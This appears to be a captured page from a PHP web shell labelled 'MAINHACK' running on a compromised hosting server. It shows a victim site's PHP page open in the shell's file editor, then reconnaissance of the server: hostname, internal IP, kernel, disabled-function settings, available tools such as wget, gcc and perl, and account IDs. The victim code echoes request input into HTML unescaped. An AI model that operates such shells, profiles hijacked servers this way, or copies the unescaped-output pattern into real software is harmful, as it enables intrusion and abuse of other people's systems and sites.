[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: basic.php
<?php include("header.php"); $oid=base64_decode($_REQUEST['oid']); $pid=base64_decode($_REQUEST['pid']); ?> <!-- Inner-Banner --> <div class="inner-banner"> <img src="images/Vivahsure-banner1.png" alt="" class="inner-banner-img"> <div class="container"> <ul> <li><a href="basic.php" class="active">Basic </a></li> | <li><a href="index.php" class="">Home</a></li> </ul> </div> </div> <!-- // Inner-Banner --> <?php $sr='package'; $stmt =$show->readwithdata($sr,'package_id',$pid); $num = $stmt->rowCount(); if($num>0){ $count=1; while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ $package_id=$row['package_id']; // echo $package_id; ?> <!-- Services Start --> <div class="services"> <div class="container"> <div class="inner-title"> <h2><?=$row['title']?></h2> <h3>Individual/Subject Verification </h3> </div> <div class="row"> <div class="col-md-7 col-sm-7 col-xm-12"> <div class="services-left"> <div class="package-box"> <div class="package-head"> <h4>Basic</h4> </div> <h5>Individual / Subject Verification</h5> <h4>Rs: <?=$row['discounted_price']?> | <del><?=$row['price']?></del></h4> <?=htmlspecialchars_decode($row['content'])?> <form method="post"> <!---- <input type="hidden" name="package" value="India With Report"> <input type="hidden" name="price" value="49000"> <input type="hidden" name="discounted_price" value="30000"> <input type="hidden" name="discount" value="39"> <input type="hidden" name="no_of_days" value="30"> <input type="hidden" name="order_id" value="<?=base64_decode($_REQUEST['oid'])?>"> ---> <input type="hidden" name="package_id" value="<?=$pid?>"> <input type="submit" name="submit_report" class="Buy-Now-submit" value="Buy Now"> </form> <?php if(isset($_POST['submit_report'])){ // echo "aaa"; if(isset($_SESSION['login_id']) && !empty($_SESSION['login_id'])) { $pid=base64_encode($_POST['package_id']); header("location:get_details.php?pid=$pid"); }else { $url='basic.php?pid='.base64_encode($pid); echo '<script> setTimeout(function() { swal({ title: "Oops!", text: "Please Login/Sign up to continue", type: "error" }, function() { swal("You will be redirected to Login page"); window.location = "login.php?pg='.base64_encode($url).'"; }); }, 1000); </script>'; } } ?> </div> </div> </div> <!-- FORM Kindly share --> <div class="col-md-5 col-sm-5 col-xs-12"> <?php// include('share-details.php');?> </div> </div> </div> </div> <?php } }?> <!--// terms End --> <?php include("footer.php"); ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 692.15 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619